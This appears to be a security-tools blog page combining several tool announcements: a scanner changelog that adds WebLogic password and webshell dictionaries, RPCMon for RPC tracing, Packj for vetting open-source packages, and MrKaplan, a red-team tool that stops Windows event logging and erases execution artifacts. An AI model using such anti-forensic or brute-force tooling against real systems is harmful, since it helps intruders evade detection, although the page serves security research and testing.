  • 2022-06-20 集成Subfinder,域名爆破,启动参数导出EnableSubfinder=true,注意启动后很慢; ssl证书中域名信息的自动深度钻取 允许通过 config/config.json 配置定义自己的字典,或设置相关开关
  • 2022-06-17 优化一个域名多个IP的情况,所有IP都会被端口扫描,然后按照后续的扫描流程
  • 2022-06-15 此版本增加了过去实战中获得的几个weblogic密码字典和webshell字典
  • 2022-06-10 完成核的整合,当然包括核模板的整合
  • 2022-06-07 添加相似度算法来检测 404
  • 2022-06-07 增加http url列表精准扫描参数,根据环境变量UrlPrecise=true开启


RPCMon - RPC Monitor Tool Based On Event Tracing For Windows

A GUI tool for scanning RPC communication through Event Tracing for Windows (ETW). The tool was published as part of a research on RPC communication between the host and a Windows container.

Overview

RPCMon can help researchers to get a high level view over an RPC communication between processes. It was built like Procmon for easy usage, and uses James Forshaw .NET library for RPC. RPCMon can show you the RPC functions being called, the process who called them, and other relevant information.
RPCMon uses a hardcoded RPC dictionary for fast RPC information processing which contains information about RPC modules. It also has an option to build an RPC database so it will be updated from your computer in case some details are missing in the hardcoded RPC dictionary.

Usage

Double click the EXE binary and you will get the GUI Windows.
RPCMon needs a DB to be able to get the details on the RPC functions, without a DB you will have missing information.
To load the DB, press on DB -> Load DB... and choose your DB. You can a DB we added to this project: /DB/RPC_UUID_Map_Windows10_1909_18363.1977.rpcdb.json.

Features

  • A detailed overview of RPC functions activity.
  • Build an RPC database to parse RPC modules or use hardcoded database.
  • Filter\highlight rows based on cells.
  • Bold specific rows.

Credit

We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get the RPC functions.

License

Copyright (c) 2022 CyberArk Software Ltd. All rights reserved
This repository is licensed under Apache-2.0 License - see LICENSE for more details.

References:

For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.



Packj - Large-Scale Security Analysis Platform To Detect Malicious/Risky Open-Source Packages


Packj (pronounced package) is a command line (CLI) tool to vet open-source software packages for "risky" attributes that make them vulnerable to supply chain attacks. This is the tool behind our large-scale security analysis platform Packj.dev that continuously vets packages and provides free reports.


How to use

Packj accepts two input args:

  • name of the registry or package manager, pypi, npm, or rubygems.
  • name of the package to be vetted

Packj supports vetting of PyPI, NPM, and RubyGems packages. It performs static code analysis and checks for several metadata attributes such as release timestamps, author email, downloads, dependencies. Packages with expired email domains, large release time gap, sensitive APIs, etc. are flagged as risky for security reasons.

Packj also analyzes public repo code as well as metadata (e.g., stars, forks). By comparing the repo description and package title, you can be sure if the package indeed has been created from the repo to mitigate any starjacking attacks.

Containerized

The best way to use Packj is to run it inside Docker (or Podman) container. You can pull our latest image from DockerHub to get started.

docker pull ossillate/packj:latest

$ docker run --mount type=bind,source=/tmp,target=/tmp ossillate/packj:latest npm browserify
[+] Fetching 'browserify' from npm...OK [ver 17.0.0]
[+] Checking version...ALERT [598 days old]
[+] Checking release history...OK [484 version(s)]
[+] Checking release time gap...OK [68 days since last release]
[+] Checking author...OK [mail@substack.net]
[+] Checking email/domain validity...ALERT [expired author email domain]
[+] Checking readme...OK [26838 bytes]
[+] Checking homepage...OK [https://github.com/browserify/browserify#readme]
[+] Checking downloads...OK [2.2M weekly]
[+] Checking repo_url URL...OK [https://github.com/browserify/browserify]
[+] Checking repo data...OK [stars: 14077, forks: 1236]
[+] Checking repo activity...OK [commits: 2290, contributors: 207, tags: 413]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...ALERT [48 found]
[+] Downloading package 'browserify' (ver 17. 0.0) from npm...OK [163.83 KB]
[+] Analyzing code...ALERT [needs 3 perms: process,file,codegen]
[+] Checking files/funcs...OK [429 files (383 .js), 744 funcs, LoC: 9.7K]
=============================================
[+] 5 risk(s) found, package is undesirable!
=> Complete report: /tmp/npm-browserify-17.0.0.json
{
"undesirable": [
"old package: 598 days old",
"invalid or no author email: expired author email domain",
"generates new code at runtime",
"reads files and dirs",
"forks or exits OS processes",
]
}

Specific package versions to be vetted could be specified using ==. Please refer to the example below

$ docker run --mount type=bind,source=/tmp,target=/tmp ossillate/packj:latest pypi requests==2.18.4
[+] Fetching 'requests' from pypi...OK [ver 2.18.4]
[+] Checking version...ALERT [1750 days old]
[+] Checking release history...OK [142 version(s)]
[+] Checking release time gap...OK [14 days since last release]
[+] Checking author...OK [me@kennethreitz.org]
[+] Checking email/domain validity...OK [me@kennethreitz.org]
[+] Checking readme...OK [49006 bytes]
[+] Checking homepage...OK [http://python-requests.org]
[+] Checking downloads...OK [50M weekly]
[+] Checking repo_url URL...OK [https://github.com/psf/requests]
[+] Checking repo data...OK [stars: 47547, forks: 8758]
[+] Checking repo activity...OK [commits: 6112, contributors: 725, tags: 144]
[+] Checking for CVEs...ALERT [2 found]
[+] Checking dependencies...OK [9 direct]
[+] Downloading package 'requests' (ver 2.18.4) from pypi...OK [123.27 KB]
[+ ] Analyzing code...ALERT [needs 4 perms: codegen,process,file,network]
[+] Checking files/funcs...OK [47 files (33 .py), 578 funcs, LoC: 13.9K]
=============================================
[+] 6 risk(s) found, package is undesirable, vulnerable!
{
"undesirable": [
"old package: 1744 days old",
"invalid or no homepage: insecure webpage",
"generates new code at runtime",
"fetches data over the network",
"reads files and dirs",
],
"vulnerable": [
"contains CVE-2018-18074,CVE-2018-18074"
]
}
=> Complete report: /tmp/pypi-requests-2.18.4.json
=> View pre-vetted package report at https://packj.dev/package/PyPi/requests/2.18.4

Non-containerized

Alternatively, you can install Python/Ruby dependencies locally and test it.

NOTE

  • Packj has only been tested on Linux.
  • Requires Python3 and Ruby. API analysis will fail if used with Python2.
  • You will have to install Python and Ruby dependencies before using the tool:
    • pip install -r requirements.txt
    • gem install google-protobuf:3.21.2 rubocop:1.31.1
$ python3 main.py npm eslint
[+] Fetching 'eslint' from npm...OK [ver 8.16.0]
[+] Checking version...OK [10 days old]
[+] Checking release history...OK [305 version(s)]
[+] Checking release time gap...OK [15 days since last release]
[+] Checking author...OK [nicholas+npm@nczconsulting.com]
[+] Checking email/domain validity...OK [nicholas+npm@nczconsulting.com]
[+] Checking readme...OK [18234 bytes]
[+] Checking homepage...OK [https://eslint.org]
[+] Checking downloads...OK [23.8M weekly]
[+] Checking repo_url URL...OK [https://github.com/eslint/eslint]
[+] Checking repo data...OK [stars: 20669, forks: 3689]
[+] Checking repo activity...OK [commits: 8447, contributors: 1013, tags: 302]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...ALERT [35 found]
[+] Downloading package 'eslint' (ver 8.16.0) from npm...OK [490.14 KB]
[+] Analyzing code...ALERT [needs 2 perms: codegen,file]
[+ ] Checking files/funcs...OK [395 files (390 .js), 1022 funcs, LoC: 76.3K]
=============================================
[+] 2 risk(s) found, package is undesirable!
{
"undesirable": [
"generates new code at runtime",
"reads files and dirs: ['package/lib/cli-engine/load-rules.js:37', 'package/lib/cli-engine/file-enumerator.js:142']"
]
}
=> Complete report: /tmp/npm-eslint-8.16.0.json

How it works

  • It first downloads the metadata from the registry using their APIs and analyze it for "risky" attributes.
  • To perform API analysis, the package is downloaded from the registry using their APIs into a temp dir. Then, packj performs static code analysis to detect API usage. API analysis is based on MalOSS, a research project from our group at Georgia Tech.
  • Vulnerabilities (CVEs) are checked by pulling info from OSV database at OSV
  • Python PyPI and NPM package downloads are fetched from pypistats and npmjs
  • All risks detected are aggregated and reported

Risky attributes

The design of Packj is guided by our study of 651 malware samples of documented open-source software supply chain attacks. Specifically, we have empirically identified a number of risky code and metadata attributes that make a package vulnerable to supply chain attacks.

For instance, we flag inactive or unmaintained packages that no longer receive security fixes. Inspired by Android app runtime permissions, Packj uses a permission-based security model to offer control and code transparency to developers. Packages that invoke sensitive operating system functionality such as file accesses and remote network communication are flagged as risky as this functionality could leak sensitive data.

Some of the attributes we vet for, include

Attribute Type Description Reason
Release date Metadata Version release date to flag old or abandonded packages Old or unmaintained packages do not receive security fixes
OS or lang APIs Code Use of sensitive APIs, such as exec and eval Malware uses APIs from the operating system or language runtime to perform sensitive operations (e.g., read SSH keys)
Contributors' email Metadata Email addresses of the contributors Incorrect or invalid of email addresses suggest lack of 2FA
Source repo Metadata Presence and validity of public source repo Absence of a public repo means no easy way to audit or review the source code publicly

Full list of the attributes we track can be viewed at threats.csv

These attributes have been identified as risky by several other researchers [1, 2, 3] as well.

How to customize

Packj has been developed with a goal to assist developers in identifying and reviewing potential supply chain risks in packages.

However, since the degree of perceived security risk from an untrusted package depends on the specific security requirements, Packj can be customized according to your threat model. For instance, a package with no 2FA may be perceived to pose greater security risks to some developers, compared to others who may be more willing to use such packages for the functionality offered. Given the volatile nature of the problem, providing customized and granular risk measurement is one of our goals.

Packj can be customized to minimize noise and reduce alert fatigue by simply commenting out unwanted attributes in threats.csv

Malware found

We found over 40 malicious packages on PyPI using this tool. A number of them been taken down. Refer to an example below:

$ python3 main.py pypi krisqian
[+] Fetching 'krisqian' from pypi...OK [ver 0.0.7]
[+] Checking version...OK [256 days old]
[+] Checking release history...OK [7 version(s)]
[+] Checking release time gap...OK [1 days since last release]
[+] Checking author...OK [KrisWuQian@baidu.com]
[+] Checking email/domain validity...OK [KrisWuQian@baidu.com]
[+] Checking readme...ALERT [no readme]
[+] Checking homepage...OK [https://www.bilibili.com/bangumi/media/md140632]
[+] Checking downloads...OK [13 weekly]
[+] Checking repo_url URL...OK [None]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...OK [none found]
[+] Downloading package 'KrisQian' (ver 0.0.7) from pypi...OK [1.94 KB]
[+] Analyzing code...ALERT [needs 3 perms: process,network,file]
[+] Checking files/funcs...OK [9 files (2 .py), 6 funcs, LoC: 184]
=============================================
[+] 6 risk(s) found, package is undes irable!
{
"undesirable": [
"no readme",
"only 45 weekly downloads",
"no source repo found",
"generates new code at runtime",
"fetches data over the network: ['KrisQian-0.0.7/setup.py:40', 'KrisQian-0.0.7/setup.py:50']",
"reads files and dirs: ['KrisQian-0.0.7/setup.py:59', 'KrisQian-0.0.7/setup.py:70']"
]
}
=> Complete report: pypi-KrisQian-0.0.7.json
=> View pre-vetted package report at https://packj.dev/package/PyPi/KrisQian/0.0.7

Packj flagged KrisQian (v0.0.7) as suspicious due to absence of source repo and use of sensitive APIs (network, code generation) during package installation time (in setup.py). We decided to take a deeper look, and found the package malicious. Please find our detailed analysis at https://packj.dev/malware/krisqian.

More examples of malware we found are listed at https://packj.dev/malware Please reach out to us at oss@ossillate.com for full list.

Resources

To learn more about Packj tool or open-source software supply chain attacks, refer to our

The vetting tool <g-emoji alias=rocket class=g-emoji fallback-src=https://github.githubassets.com/images/icons/emoji/unicode/1f680.png>&#128640;</g-emoji> behind our large-scale security analysis platform to detect malicious/risky open-source packages (7)

Upcoming talks

Feature roadmap

  • Add support for other language ecosystems. Rust is a work in progress, and will be available in July '22 (last week).
  • Add functionality to detect several other "risky" code as well as metadata attributes.
  • Packj currently only performs static code analysis, we are working on adding support for dynamic analysis (WIP, ETA: end of summer)

Team

Packj has been developed by Cybersecurity researchers at Ossillate Inc. and external collaborators to help developers mitigate risks of supply chain attacks when sourcing untrusted third-party open-source software dependencies. We thank our developers and collaborators.

We welcome code contributions. Join our discord community for discussion and feature requests.

FAQ

  • What Package Managers (Registries) are supported?

Packj can currently vet NPM, PyPI, and RubyGems packages for "risky" attributes. We are adding support for Rust.

  • Does it work on obfuscated calls? For example, a base 64 encrypted string that gets decrypted and then passed to a shell?

This is a very common malicious behavior. Packj detects code obfuscation as well as spawning of shell commands (exec system call). For example, Packj can flag use of getattr() and eval() API as they indicate "runtime code generation"; a developer can go and take a deeper look then. See main.py for details.

  • Does this work at the system call level, where it would detect e.g. any attempt to open ~/.aws/credentials, or does it rely on heuristic analysis of the code itself, which will always be able to be "coded around" by the malware authors?

Packj currently uses static code analysis to derive permissions (e.g., file/network accesses). Therefore, it can detect open() calls if used by the malware directly (e.g., not obfuscated in a base64 encoded string). But, Packj can also point out such base64 decode calls. Fortunately, malware has to use these APIs (read, open, decode, eval, etc.) for their functionality -- there's no getting around. Having said that, a sophisticated malware can hide itself better, so dynamic analysis must be performed for completeness. We are incorporating strace-based dynamic analysis (containerized) to collect system calls. See roadmap for details.



MrKaplan - Tool Aimed To Help Red Teamers To Stay Hidden By Clearing Evidence Of Execution


MrKaplan is a tool aimed to help red teamers to stay hidden by clearing evidence of execution. It works by saving information such as the time it ran, snapshot of files and associate each evidence to the related user.

This tool is inspired by MoonWalk, a similar tool for Unix machines.

You can read more about it in the wiki page.


Features

  • Stopping event logging.
  • Clearing files artifacts.
  • Clearing registry artifacts.
  • Can run for multiple users.
  • Can run as user and as admin (Highly recommended to run as admin).
  • Can save timestamps of files.
  • Can exclude certian operations and leave artifacts to blue teams.

Usage

  • Before you start your operations on the computer, run MrKaplan with begin flag and whenever your finish run it again with end flag.
  • DO NOT REMOVE MrKaplan registry key, otherwise MrKaplan will not be able to use the information.

IOCs

  • Powershell process that access to the artifacts mentioned in the wiki page.

  • Powershell importing weird base64 blob.

  • Powershell process that performs Token Manipulation.

  • MrKaplan's registry key: HKCU:\Software\MrKaplan.

Acknowledgements

Disclaimer

I'm not responsible in any way for any kind of damage that is done to your computer / program as cause of this project. I'm happily accept contribution, make a pull request and I will review it!



❌